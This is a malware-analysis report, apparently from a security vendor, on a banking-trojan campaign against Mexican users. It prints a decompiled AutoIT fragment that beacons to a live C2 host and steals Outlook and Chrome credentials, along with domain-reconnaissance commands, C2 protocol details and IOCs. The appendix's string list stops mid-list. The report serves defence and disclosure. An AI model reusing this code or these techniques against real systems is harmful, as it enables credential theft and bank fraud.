Overview

  • Perception Point researchers chose the name for the threat actor, Manipulated Caiman, based on one of the files analyzed, containing the words “Loader Manipulado” in the pdb path. Based on extensive research, the attacker’s origin is likely Latin America, so the researchers chose the caiman reptile to represent the actor.
  • Manipulated Caiman has been active for at least two years, targeting primarily the citizens of Mexico. Based on Perception Point’s research, the potential revenue the group has accumulated is over $55 million.
  • There have been over 4K victims in total, with over 140 victims in the past two months alone.
  • Manipulated Caiman uses a wide arsenal of tools against victims, though its ultimate goal is to gain access to victims’ bank accounts.
  • Manipulated Caiman employs spear phishing with malicious attachments to deliver malware, such as URSA, SMTP bruteforce client, malicious extension installer, net info checker, and spammer client. 

May 2023 Campaign Analysis

At the end of May 2023, a massive phishing campaign was widely distributed, targeting both individuals and organizations based in Mexico.

The images below display examples of the phishing emails sent by the threat actors:

Each email contained a zip archive whose name matches the regex pattern: FACTURA_PDF_XML_\d{6}\.zip

The actor used topics related to CFDI (an electronic invoice format mandated in Mexico) to localize the attack and deceive victims into opening the attachment, which runs the malicious file.

Execution Flow

The attack components span multiple stages. The image below shows the steps involved in the attack:

The execution flow is complex and intricate. In the next section, we will break it down. 


Initial Execution Trigger

The phishing email’s attachment is a .zip archive containing a .url shortcut file. When the user opens it, the shortcut resolves and executes the following path:

URL=file:\\45.81.39[.]154@80\Downloads\FACTURA_ONLINE.jse
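The two lure characteristics above (the attachment name pattern and a .url shortcut whose file: target points at a remote host on port 80, the WebDAV host@port form) can be checked mechanically on an extracted attachment. The following is an added example written for this page, not code from the post or from the malware; the .url content and the host 203.0.113.10 are constructed placeholders.

```python
import configparser
import re
from typing import Optional

# Attachment name pattern the campaign used: FACTURA_PDF_XML_ + six digits + .zip
LURE_ZIP_RE = re.compile(r"^FACTURA_PDF_XML_\d{6}\.zip$", re.IGNORECASE)

# A file: URL whose "host" is a remote machine. Windows also accepts the
# host@port form (here @80), which makes Explorer fetch the file over WebDAV.
REMOTE_FILE_URL_RE = re.compile(
    r"^file:[\\/]{2}(?P<host>[^\\/@]+)(?:@(?P<port>\d+))?[\\/](?P<path>.+)$",
    re.IGNORECASE,
)

# Script extensions Windows Script Host runs straight from a double-click.
SCRIPT_EXTENSIONS = {"jse", "js", "vbs", "vbe", "wsf", "wsh", "hta"}


def shortcut_target(url_file_text: str) -> Optional[str]:
    """Return the URL= value of an Internet Shortcut (.url files are INI text)."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(url_file_text)
    return parser.get("InternetShortcut", "URL", fallback=None)


def analyse_target(url: str) -> dict:
    """Describe where a .url target points and whether it would run a script."""
    match = REMOTE_FILE_URL_RE.match(url.strip())
    if not match:
        return {"remote_file": False, "url": url}
    host = match["host"]
    path = match["path"].replace("/", "\\")
    extension = path.rsplit(".", 1)[-1].lower() if "." in path else ""
    return {
        "remote_file": host.lower() not in {"localhost", "127.0.0.1"},
        "host": host,
        "port": int(match["port"]) if match["port"] else None,
        "path": path,
        "runs_script": extension in SCRIPT_EXTENSIONS,
    }


def triage_attachment(zip_name: str, url_file_text: str) -> dict:
    """Combine the lure-name check with the shortcut-target check."""
    target = shortcut_target(url_file_text)
    verdict = {
        "lure_name": bool(LURE_ZIP_RE.match(zip_name)),
        "target": analyse_target(target) if target else {"remote_file": False},
    }
    # A shortcut that pulls a script from a remote host is the key signal here.
    verdict["suspicious"] = bool(
        verdict["target"]["remote_file"] and verdict["target"].get("runs_script", False)
    )
    return verdict


# Constructed sample .url content mirroring the campaign's shortcut; the host
# (203.0.113.10, a documentation address) is a placeholder, not the real server.
SAMPLE_URL_FILE = (
    "[InternetShortcut]\n"
    r"URL=file:\\203.0.113.10@80\Downloads\FACTURA_ONLINE.jse" "\n"
)

# Constructed benign shortcut for comparison.
BENIGN_URL_FILE = "[InternetShortcut]\nURL=https://www.example.com/\n"

if __name__ == "__main__":
    print(triage_attachment("FACTURA_PDF_XML_123456.zip", SAMPLE_URL_FILE))
    print(triage_attachment("report.zip", BENIGN_URL_FILE))
```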

FACTURA_ONLINE.jse presents a message box with the text:

“Este mensaje ha sido emitido por error. por favor haga caso omiso.” (English: This message has been issued in error. Please ignore it.)

The script then sends a GET request to the following URL:

https://jogjaempatroda[.]com/redirect/inc3/ex.php?x=1

The script then tries to run the content returned by the request. If the request comes from an IP located in Mexico, the response contains malicious code, which the script runs. This is a form of geofencing: if the request comes from anywhere outside Mexico, a legitimate website is returned instead and the script terminates.

Below you can see the difference in responses to a request that originates within Mexico and to a request that comes from outside of the country:

The malicious response contains two base64 certificates, which are both decoded and saved on the victim’s computer under the following paths:

%APPDATA%/lamentacao/habitarao.exe
%APPDATA%/lamentacao/escreverao.a3x


AutoIT Downloader & InfoStealer

Habitarao.exe is the legitimate AutoIT3.exe interpreter, which runs compiled AutoIT scripts (.a3x). Here it is used to execute escreverao.a3x.

Escreverao.a3x is a compiled AutoIT script that can be decompiled using online tools such as myAut2Exe. We analyzed the script and found that it shares a similar structure with previously disclosed campaigns associated with the URSA Trojan Banker:

Global $SURLINFO = "https://jogjaempatroda.com/redirect/inc3/do/it.php"
If _ISWIN7() Then $SURLINFO = "http://jogjaempatroda.com/redirect/inc3/do/it.php"
FileDelete(@ScriptFullPath)
Local $ISADMIN = "User"
If IsAdmin() Then $ISADMIN = "Admin"
Local $SSERIAL = Hex(DriveGetSerial(@HomeDrive & "\")) & "1"
_ILNKER($SURLINFO & "?b1&v1=" & Dec(@OSLang) & "&v2=" & Dec(@KBLayout) & "&v3=&v4=" & _GETOS() & "&v5=" & $ISADMIN & "&v6=" & @OSArch & "&v7=" & AV() & "&v9=" & $SSERIAL, $SURLINFO)
_OUTRECOVERY()
_CHROMERECOVERY()
_OLISTS($SURLINFO & "?b3&v1=" & Dec(@OSLang) & "&v2=" & Dec(@KBLayout) & "&v3=&v4=" & _GETOS() & "&v5=" & $ISADMIN & "&v6=" & @OSArch & "&v7=" & AV())

The script executes three main operations:

  1. Fetch next stage payload
  2. Create persistence
  3. Steal Outlook & Chrome credentials

The script creates a GET request to the URL:

https://jogjaempatroda[.]com/redirect/inc3/do/it.php

The GET request contains information added by the script:

  • v1 = operating system language
  • v2 = keyboard layout
  • v4 = operating system
  • v5 = admin privileges
  • v6 = operating system architecture
  • v7 = installed antivirus software
  • v9 = default disk serial number

When we first ran the script during our investigation, we did not receive the payload, because we sent the request from a computer with an English operating system.

The values of v1 and v2 in our case were: 1033 (English – United States)

Because we knew that the campaign was intended for a Mexican audience, we changed the values of v1 and v2 to 2058 (Spanish – Mexico) and received the payload in response to the updated request. The script later runs the payload returned by the following request:

https://jogjaempatroda[.]com/redirect/inc3/do/it.php?b1&v1=2058&v2=2058&v3=&v4=Windows 7&v5=User&v6=X64&v7=Microsoft Defender

The downloaded payload is saved in the same folder where the executables are located under the name h2kvs7ajf4.

The script then creates two different persistence methods:

  1. Creating a value under the registry key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 
  2. Creating a shortcut file (.lnk) under the startup folder: [Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

The script then executes the downloaded payload.

In parallel to the execution of the next stage payload, the script also steals local Outlook and Chrome credentials, and it then creates a POST request to the following URLs:

https://jogjaempatroda[.]com/redirect/inc3/do/it.php?info=
https://jogjaempatroda[.]com/redirect/inc3/do/it.php?info2=

2nd AutoIT Downloader Script

The previous script downloads a payload which is yet another compiled AutoIT script (.a3x).

After decompiling the file, we can see that the script has several operations:

  1. Sleep for 60 to 100 seconds.
  2. Arrange a list of C&C domains.
  3. Retrieve the default disk serial number
  4. Send GET request to a C&C domain. 
  5. Handle response from the C&C domain.

Here is an example of a GET request to a C&C domain:

http://miningrus1[.]click/system/?h=A1B2-C3D4\1

Below you can see the response we got upon establishing connection with one of the C&C domains:

The script checks for three possible arguments that may be in the response:

  1. .DOW – download and execute executable file (.exe)
  2. .DAW – download and execute AutoIT executable (.a3x)
  3. .DIW – download and execute Windows Installer (.msi)

The response we got contained a .DOW argument, meaning that the script will download and execute an executable file, which is hosted on the following URL:

https://jogjaempatroda[.]com/redirect/inc4/ornot.exe

Loader Manipulado

The executable (ornot.exe) executed by the script is a VisualBasic 6.0 compiled executable:

This executable is actually a dropper, containing an embedded executable in its resource section:

The executable drops the embedded executable under the following path and immediately executes it:

%APPDATA%/Microsoft/eps2.exe

The dropped executable is also a VisualBasic 6.0 compiled executable:

The first thing we noticed while analyzing the executable is that the threat actor left the project path in the strings:

@*\AC:\Users\Alex Mason\Desktop\Loader Manipulado\Proyecto1.vbp

The path contains the string: “Loader Manipulado” (meaning: Manipulated Loader in Portuguese, which gave us the inspiration for the actor’s name).

Diving deeper into the code, we found that the executable has several anti-VM techniques, including extracting the computer’s BIOS version and system model and comparing them to versions and models known to belong to virtual machine environments:

The executable also compares the language of the OS with those values:

  • 1034 (Spanish – Spain)
  • 1046 (Portuguese – Brazil)
  • 2058 (Spanish – Mexico)
  • 2070 (Portuguese – Portugal)
  • 3082 (Spanish – Spain)
  • 58378 (Spanish – Latin America)

If the language of the infected computer is one of the above, the executable continues to the next anti-VM check which compares the computer name to “JOHN-PC”.

If the checks are passed the executable then moves to another function that contains a number of obfuscated strings:

After deobfuscating the strings we understood the purpose of the function:

The first part of the function looks for the current, active window title. If it contains one of the bank names (BBVA, Banorte, Citibanamex, Santander, Scotiabank) the executable downloads two executable files and saves them under the public folder.

AutoIT Loader

The executable files are downloaded from the following URLs:

https://www.css-styles[.]com/media/descarga/auit
https://www.css-styles[.]com/media/descarga/btudt

Auit is the same executable as Habitarao.exe (the only difference is the version: Habitarao.exe is AutoIT3.exe version 3.3.16.1 and Auit is version 3.3.14.5), so it serves the same purpose of executing a compiled AutoIT3 script (btudt).

The decompiled code of btudt contains two primary components:

  1. Embedded executable in the form of a hexcoded blob of data with reversed MZ hex bytes (4D5A).
  2. Function (RBY) that receives the decoded hexcoded executable as an argument; the function contains strings that are decrypted during execution.

The function J is responsible for decrypting the encrypted strings. We wrote a python script (Appendix 1) that replicates the decryption process and prints out the decrypted strings:

Based on the output we found that the strings represent an injection procedure (APIs such as WriteProcessMemory & CreateProcessW).

HolaHola Downloader

By dumping out the hexcoded, embedded executable and converting it to its binary format we observed that the executable is yet another VisualBasic 6.0 compiled executable:

The executable contains an embedded blob of data encrypted with RC4. The key is holahola (see Appendix 2 for the decryption script).

The decrypted blob of data is a VisualBasic script:

The script sends a POST request to the following URL:

https://www.aplications-update[.]com/a/b/

The request contains several parameters:

  • s = 1 (default parameter)
  • a = id (generated by the script)
  • c = currently running processes
  • b = installed antivirus software
  • d = operating system name, version, service pack (if any) and architecture
  • e = the name of the current user

Each parameter value is encrypted using RC4 encryption and the key (holahola).

The response to the request is encrypted using the same algorithm and key; the script decrypts the response and handles the decrypted data. The decrypted data has three fields:

  1. Sleep time
  2. Operation flag
  3. Argument for the operation

There are five operations that can be executed by the script:

  1. Download and execute file
  2. Kill process by ID
  3. Kill process by name
  4. Self deletion 
  5. Download and execute AutoIT file
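The beacon and its reply can be decoded offline by anyone who has the key. The following is an added example written for this page, not the post’s code, Appendix 2, or the malware’s: a plain-Python RC4 with the key holahola, applied to a constructed beacon body and C2 reply. It assumes the encrypted values travel hex-encoded (Appendix 2 decrypts a hex blob) and uses an assumed '|' separator for the three reply fields, which the post does not specify; all sample values are invented.

```python
KEY = b"holahola"  # the RC4 key the post names for the HolaHola downloader


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation, XORed in
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def encrypt_param(text: str) -> str:
    """RC4 a parameter value and hex-encode it (hex on the wire is an assumption)."""
    return rc4(KEY, text.encode("utf-8")).hex()


def decrypt_param(blob: str) -> str:
    """Inverse of encrypt_param: hex-decode, then RC4 with the same key."""
    return rc4(KEY, bytes.fromhex(blob)).decode("utf-8", errors="replace")


# Meaning of each POST parameter as described in the post.
PARAM_MEANING = {
    "s": "default parameter", "a": "bot id", "c": "running processes",
    "b": "installed antivirus", "d": "OS name/version/SP/arch", "e": "user name",
}


def decode_beacon(form: dict) -> dict:
    """Decrypt every field of a captured beacon body into readable form."""
    return {f"{name} ({PARAM_MEANING.get(name, '?')})": decrypt_param(value)
            for name, value in form.items()}


def parse_task(encrypted_response: str, sep: str = "|") -> dict:
    """Decrypt a C2 reply and split it into the three fields the post describes.
    The field separator is not given in the post; '|' is an assumed placeholder."""
    sleep_time, op_flag, argument = decrypt_param(encrypted_response).split(sep, 2)
    return {"sleep": int(sleep_time), "op": int(op_flag), "arg": argument}


# Constructed sample beacon and C2 reply (all values invented), produced with the
# same routine so the decoder can be exercised without any network capture.
SAMPLE_PLAIN = {"s": "1", "a": "A1B2C3D4", "c": "explorer.exe;chrome.exe",
                "b": "Microsoft Defender", "d": "Windows 7 SP1 X64", "e": "user1"}
SAMPLE_FORM = {k: encrypt_param(v) for k, v in SAMPLE_PLAIN.items()}
SAMPLE_REPLY = encrypt_param("60|5|https://c2.invalid/payload.a3x")

if __name__ == "__main__":
    for field, value in decode_beacon(SAMPLE_FORM).items():
        print(f"{field}: {value}")
    print(parse_task(SAMPLE_REPLY))
```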

In our case, the script downloads and executes an AutoIT file, which is retrieved from the following URL:

https://stats.javas[.]live/media/tareas/injmx

AutoIT Banker: Gaining Access to the Victim’s Bank Account

The retrieved file is a compiled AutoIT script executable. 

The AutoIT banker malware first checks if the current active window contains one of the below browsers:

  • Google Chrome
  • Internet Explorer
  • Microsoft Edge

The banker malware monitors the user’s browser activity by checking the URLs the user visits and comparing them to the URL “bbvanet.com[.]mx/mexiconet”.

If the user accesses that URL, a forged request is injected into the browser to steal a locally stored value that probably holds the user’s session token.

We created a fake value for the key ixd1 in the local storage of the targeted website and browsed to the website. At the same time, we monitored the network traffic and saw that a forged request was made to the C2 server that included the value of the ixd1 key alongside with the full URL path encoded in base64:

This ends the current campaign. The threat actor gains access to the user’s bank account and can extract all the information desired: account balance, recent actions taken, screenshots and more.


Caiman’s Poor OpSec

In this section we disclose a number of poor OpSec (operations security) decisions made by the threat actor that allowed us to uncover the real volume of the infections, the possible revenue from them, and some of the tools the threat actor used.

Open RestAPI

Working together with @Merlax_, we found that the C2 server hosted a Django REST framework application, meaning that there was an open API endpoint we could browse to view various data tables.

The names of the tables are written in Spanish. Here is the translated version of the names:

  • Tasks/run
  • Records
  • Simple_records
  • Injections
  • Angular.js
  • Mov/logs
  • Mov/highs
  • Accounts

The interesting tables are “Records” and “Simple_records” (a mini version of the “Records” table). Those two tables contain the data of the infected users, including their balance, date of infection, latest transactions, and, in some cases, a screenshot of their bank account.

We also can see the total number of infections:

In this C2 server we found over 140 victim logs from the past two months alone.

We didn’t stop there: together with @Merlax_ we found three more C2 servers that followed the same pattern and exposed the same open REST API access as our C2 server.

By summarizing all the data we could harvest from those C2 servers, we managed to find over 4K victims in total with a possible revenue of $55 million (please note: this calculation is based on the balance amount at the time of infection). The earliest sign of infection we could trace back was about a year ago.

Panel Login Page

We found a panel login page that was seen in all four C2 servers that hasn’t been previously disclosed anywhere:

Spam Web Panel

Working together with @1ZRR4H, we identified a web panel hosted on several domains presented in the execution flow (miningrus1[.]click and moscow12[.]at):

The panel is used for distributing emails. The actor can modify the sender name, subject, content of the mail, and through which SMTPs the mails will be sent. The actual spamming is done by a botnet. (The spamming payload is explained later).

Both domains resolve to the IP: 194.180.48[.]54

While investigating miningrus1[.]click we found a urlscan.io scan that fetched a payload from the domain. Naturally, we started to investigate the payload.

Caiman’s ToolKit

Ascan

Ascan is written in .NET and serves the purpose of brute-forcing SMTP servers that use weak credentials.

Ascan generates a random IP address and checks whether it has SMTP open (port 587). On a hit, the program first tries to send a test mail without authenticating (it uses the username nouth and a blank password); if that fails, it iterates through a dictionary of usernames and passwords, looking for a weak credential setup.

The test mail is sent to “[email protected]” with the display name “Rose Amag3”.

In other Ascan samples we found two other recipient mailboxes:

We searched for these mailboxes on the relay attempts page created by researcher Alexey Shpakovsky and found many SMTP relay attempts. The interesting part was that most of the IPs conducting the attempts were private IP addresses located primarily in Mexico. This led us to conclude that, upon a successful infection, Ascan (and all the following tools) are downloaded and stored on the victim’s computer as part of the persistence mechanism.

ExtInstallShortCut

We observed additional campaigns conducted by the same threat actor which installed malicious browser extensions on the victim’s Google Chrome or Microsoft Edge browser.

The distributed executables contained base64 encoded strings, which, when decoded, reveal the content of the malicious extension:

The extension name was set to “Chrome Notification” to discourage users from deleting the extension if they notice it.

The extension monitors the current site visited by the user. If the site is one of the targeted sites by the extension, it will redirect the user to a phishing site that impersonates the targeted bank.

Below is a list of the targeted banking sites and phishing sites observed during our analysis:

  • Targeted sites:
    • Bancanetempresarial.banamex[.]com
    • Bancanetempresarial[.]citi
    • banamex[.]com
  • Phishing sites:
    • Citlibamanex[.]group
    • banamexunopaboti[.]run



NetInfo

In certain cases (probably on high-value targets), the actor drops the NetInfo executable. This is a simple reconnaissance tool that gathers information about the domain the user may belong to.

The commands below are executed:

net group "Domain Admins" /domain
net group "domain computers" /domain
nltest /domain_trusts /all_trusts
nltest /domain_trusts
net view /all

After the commands are executed, a concatenated string (which contains the response of each executed command) is sent via a POST request to one of the actor’s domains.

Spmr

Spmr.exe is the spamming tool used by the actor to conduct the phishing campaign.

It uses the infected machines as spamming stations to send out phishing emails.

The tool starts by fetching the campaign configuration information using a GET request to a hardcoded C&C URL.

The URL may have three possible responses:

  • EXIT; – the campaign was terminated.
  • WAIT; – the campaign hasn’t started yet, try again later.
  • Campaign data – will contain the hash of the configuration, and the spam list.

The configuration data itself is hosted on another URL which is built as an XML document and has nine data fields which are base64 encoded. The tool decodes those values and uses them for establishing the spamming campaign.

The fields are:

  1. Sender name
  2. Subject
  3. Sending method
  4. Sending content type
  5. Body content
  6. SMTP list
  7. Links
  8. Attachment name
  9. Attachment URL

The tool then conducts the spamming campaign by relaying through the SMTP servers found previously (by the Ascan tool) and sending the emails to the spam list.

Diamond Model


IOCs

Files – 


IPs –


Domains –


SMTP relays recipients – 

  • test@hostxbay[.]com
  • r9900u@rambler[.]ru
  • r9900u@gmail[.]com

Appendixes

Appendix 1 – Python Script For btudt Strings Decryption

strings = ['UHAIRISHOJEJBJFIIJEGUJCIKIHJDILFPFKIHJJJDILIAFKFHFOFHGUIOIUIGJCJIHIIKIUFPFMIHGUIOIUIGJCJIFRFHFOFHFKICFKFQ', 'JPKRGQKRBPKJHJIPIPIODQERJQAMBRARDRCJHODPKRDPKRCRFQAPJMCQKRERBJIMKQARCQGRDQKQKMCQKRERBJIOEQERDQHPKMCPJRHQJRCPJJIOIMCPJRHQJRCPJJIOJMCPJRHQJRCPJJIOIOEQDRKPKMCPJRHQJRCPJJIOJOEQDRKPKMCPJRHQJRCPJJIOIMKQJRFQIREMJQDPGRCRCMCPJRHQJRCPJJIOJMKQJRFQIREMJQDPGRCRCMCPJRHQJRCPJJINBQEQGQHMHRERDRCQDPIREREPKMCPJRHQJRCPJJINBQHPGQCRCMCRGQKRBPKJHOEQCQKRGOIQDQJPJQKRGMCRGQKRBPKJHODPKRDPKRCRFQAPJLEMBRARDRCJHODPKRDPKRCRFQAPJLEMBRARDRCJHQDODREPJNFQIRAREREMBRARDRCJHQDODREPJOAREREQKRFRDMCQKRERBJIQCOERDPKNARCRBQKRB', 'OMAMDMCGPKAMBLPLCLFMCMDIKMAMDMCGPKELHMCLELBLDILLDMHLOMCLDHAJPMCLOLDLEMDMCJJLDILLDMHLOMCLDHAKDLIMBLFLALEJILE', 'SHLJRJFJAKAJEIEJRJPJCJFJSJTIK', 'NKJMMMKLMMAMNMO', 'OKELHMCLELBLD', '[GYHOHHHJGYELFTHGHGHLGZHPHMFVHEGUG\HKFLGXHPHGHKGXEMFTHKE\FLELGYHOHHHJGYELFUHJFBFKEMGXHPHGHKGXEMFTHKFBFLELGYHOHHHJGYELFUHJFDFKEMGXHPHGHKGXEMFTHKFFFLELGYHOHHHJGYELFUHJFHFKGYHOHHHJGYELFTHGHGHLHKHGHEGKHHHJGYFKEMGXHPHGHKGXEMGGHMGUHMHMHLGKHHHJGYFKEMGXHPHGHKGXEMGHGVG[GLHGHKGXFLELGYHOHHHJGYELFVHJHKHGHKGCG[GZHLGYHMFKEMGXHPHGHKGXEMFUHKHJHHHJGHGYHEGYGXHLHHHJFLELGYHOHHHJGYELFUGUHMGUGDGZG[HKGZHLFLELGYHOHHHJGYELFUGUHMGUGHGYHEGYGXHLHHHJFLELGWHQHMGYEMGFGZG[HBHKHMGYHKFQHKGYGVGOFIE\GRFKEMGXHPHGHKGXEMFSHKE\GCHHHQGGHMGUHMGYFLGXHPHGHKGXEMGGGZG[FXHKFLELGYHOHHHJGYELGHGYG\FVHLFKEMGXHPHGHKGXEMGGGZG[FVHKFLELGYHOHHHJGYELGHGYG\FTHLFKGYHOHHHJGYELFVGXHBFKEMGXHPHGHKGXEMFUHLHAFLELGYHOHHHJGYELFVGVHQFKEMGXHPHGHKGXEMFUGYHPFLELGYHOHHHJGYELFVGWHQFKEMGXHPHGHKGXEMFUGVHPFLGXHPHGHKGXEMFUGWHHFLELGYHOHHHJGYELFVHAHIFKEMGXHPHGHKGXEMGGGZG[FTHKFLELGYHOHHHJGYELFVFVHEGUG\HKFLELGYHOHHHJGYELFVHKHIFKEMGXHPHGHKGXEMGGGZG[GHHKFLGVHRHLGZELFVHPHMGYHGGXGZGXGGGYG\HAHLHLGZHJHLGOFFFAFCGQ', 
'KOHOLOFPJJAMIOFOKPBOGNLKFOBLCQDPGPKOHJALJQFPLOJPKMLPFMIOEPLPLNAOEOLOILDQCPHPJOIILNAOEOLOIPLLCQDPGPKOHJANBOJPDPHOGOFPLPBPGPGPKLDQCPHPJOIILNDPAQGOIPHOJMEOIOFOHOJPJLDQCPHPJOIILMJPAPGPAPFQAPFMAQEPLPKOELDQCPHPJOIILMJOEQEPAPFQAPFMAQEPLPKOELDQCPHPJOIILNDNCLDQCPHPJOIILNDMLLDQCPHPJOIILLLOLOJOGPDPKQBPELDQCPHPJOIILMFMLLDQCPHPJOIILLLNCLDQCPHPJOIILNCOIPEPGOHOEQAPAPHPFLDQCPHPJOIILMLQBOJPJPEOEQFLCOHOLOFPJJANBOJPKOJPJQCOIOINKLAOALDQCPHPJOIILMLMAMJMEOIOIPGPLPBOJPBOIPKLCQDPGPKOHJAMKMBMIMFPFOKPGPKPEOFPLPBPGPGLCOHOLOFPJJANBOJPKOJPJQCOIOIKFNLKFKEOALDOHQDPGPKOHJALIOIOHPKOIPLPKMLOJMKOIQDMAQEOIMEOIOFOHOJPJ', 'ZHVHMHQHBEPGFG[HAHGHGHMHCFPHUHNHPHCEOGHHSHLG[HDHPGIHDGMHCHBHRHHHMHMHQFPHBHVHMHQHBEPGMHHHKHDFXG[HRHDGLHSGZHLHNFPHBHVHMHQHBEPGIHNHGHMHRHDHPGNHMGMHWHLG[HNHJGNGZHAHJHDFOHCHUHNHPHCEOGHHSHLG[HDHPGIHDGMHWHLG[HNHJHRFOHVHMHQHBEPGLHHHXHDGHHEGHHOHRHHHMHMGZHKGAHDGZHCHCHQFOHVHMHQHBEPFWHGGZHQGZHBHRHDHPHHHQHSHGHBHQ', 'PLNLELIKKGLJEKIKNKQKJIEKILPLJKMGKJFKHLALELIJDKQLDLBKLLIJNKMLHLJKPLFLDIEKILPLJKMGKJFKPLELELIJDKQLDLBKLLIJNKMLHLJKPLFLDIEKKLNLELIKKGLJKKQLPKMJGKNILLFKKKMIDKLLMLFLHKLGKJLKPLQKLJHKMJBLDKQLJKQKHLCKPLQKLKLIMKILJKIIDKLLMLFLHKLGKJLKPLQKLJHKMJNLDKQLDKQLJKQKHLCKPLQKLKLIMKILJKIIDKLLMLFLHKLGKIKKKKLLHKMLILJJGKNINLELJLILOJILEKQLDLKIDKLLMLFLHKLGKILKHLJKLJHKMIMLEKLKLIEKKLNLELIKKGLIKKILIKMJGKNIMKILJKIIDKLLMLFLHKLGKJBLCKIKNKMIKKILIKMIDKLLMLFLHKLGKJLKLKKLJKQLELEIJLCKPKOLDLDKLLELJIEKKLNLELIKKGLIOKQLBKMIJLCKPKOLDLDKLLELJIELMLFLHKLGKJFKHLALELIJGLGKLLIKHLKKPLEKNJLLOLJLJKMLCJOKLLILIKQLELEIDLNLELIKKGLJEKQLDLFLHJHLFKMLHKILJKQLDKOJKLPLILKKLLDJNKMLHLJKPLFLDIELMLFLHKLGKJFKHLALELIJALDKHKOKLJOKLLILIKQLELEIDLNLELIKKGLJEKQLDLFLHJBLCKIKNKMJNKMLHLJKPLFLDIELMLFLHKLGKJFKHLALELIJKLLKILJLOLJLJKMLCJOKLLILIKQLELEIDLNLELIKKGLJEKQLDLFLHJLLKKJLILPLILKKLLDJNKMLHLJKPLFLDIEKKLNLELIKKGLJOKQLDHNHLJOKLLILIKQLELEJNKILBLLKLIEKKLNLELIKKGLJKKQLPKMJGKNJALDKHKOKLIEKKLNLELIKKGLJKKQLPKMJGKNIQKMKHKLKLLILIIEKKLNLELIKKGLILKPKLKKLAJLLKLDIDLNLELIKKGLJKLLKILJLOLJLJKMLCIELMLFLHKLGKINLBLCILKPKHLIKHKKLJKMLHKQLILKKPKKLIIEKKLNLELIKKGLJKKQLPKMJGKNJKLKKHKKLAJKKLLJKLLILLKMIDKLLMLFLHKLGKJLKPLQKLJHKMJLLJKIKJLBILLFLCLDKPLKIDKLLMLFLHKLGKJLKPLQKLJHKMJAKLKILFJKKLLJKLLILLKMIDKLLMLFLHKLGKJLKPLQKLJHKMJAKLKILFIMLELDLCKQLJIEKKLNLELIKKGLJDLFKHKLKLLIIOLCKHKOLIIEKKLNLELIKKGLJFLLLCKJKLLIJGKNJJLMKHIKLDKLJKKQLPKMLI', 'XGHHVHWGVIFICIGHMIFGJHPIEGHHKIFHKFEEYIFGLGQGDGKGHHJGRGTGWGMGRGRGDGPHIGLGHGEGGGIGUFIEUHUFDEXHBGKGHGLGQGLGRGMGFGLGSGMGGGMGHGKGUGLGTGKGKGLHCGMGHGMGGGMGMGKGWGLHCGLGWGLHBGMGIEXFEFF', 'THGJDJEHUJMJJJNIPJMHIISJLHGINJMINFUFPJMHKHPHCHJHGIMHQHSIAHLHQHQHCHOILHKHGHDHFHHHTGDFLJCFTFOIHHJHJHKHCHKHUHJIFHJHFHJIGHIIFHJIFHJICHJIEHJIGHKHLHKHNFOFUGA', 'THGJDJEHUJMJJJNIPJMHIISJLHGINJMINFUFPJMHKHPHCHJHGIMHQHSIAHLHQHQHCHOILHKHGHDHFHHHTGDFLJCFTFOIGHJHEHKHMHJIHHKHGHKHFHIICHJIHHKHSHKHFFOFUGA', 'THGJDJEHUJMJJJNIPJMHIISJLHGINJMINFUFPJMHKHPHCHJHGIMHQHSIAHLHQHQHCHOILHKHGHDHFHHHTGDFLJCFTFOHPHNHOHPHFHQHIHOHQHNHKHPHCHNHEHPHJHOHNHPHDHPHCFOFUGA', 'JPJQCPHRBJINJPHQHQAPALKPCMCPJRHQJRCPJJIOFQJQDQKQIOAQAOHQDRCRDRFPGQHODQERJQAMHQJPJOBQCRJRCQEPIPHQGMIPJPKRBQARCRDMBPKRGQKRBPKJHOHQDRCRDRFPGQHMHPKPJRCPKRDRCMCPJRHQJRCPJJIODQERJQANKQBOCPHRGNAPGREPGMCPJRHQJRCPJJIOAQKQDQJRDQARBOFQJODPGRHMKPHRDPHMBPKRGQKRBPKJHOBQJQEQIREPKRCOEQKOCQAQGQKPIPHRDQEQJQJRCMCPJRHQJRCPJJIOAQKQDQJRDQARBOFQJNIQDQJPKQJREQIPHQARBRDMBRHQJRCPJJINJRFQHPIPKRCNKQBOCQAQGQKPIPHRDQEQJQJRCMCRGQKRBPKJHNKREQIPHQARBOAQANIQDQJPKQJREQIPHQARBRDMBPKRGQKRBPKJHMKQCPHRBPHPIREPKRCQDRDRDQEPIRD', 
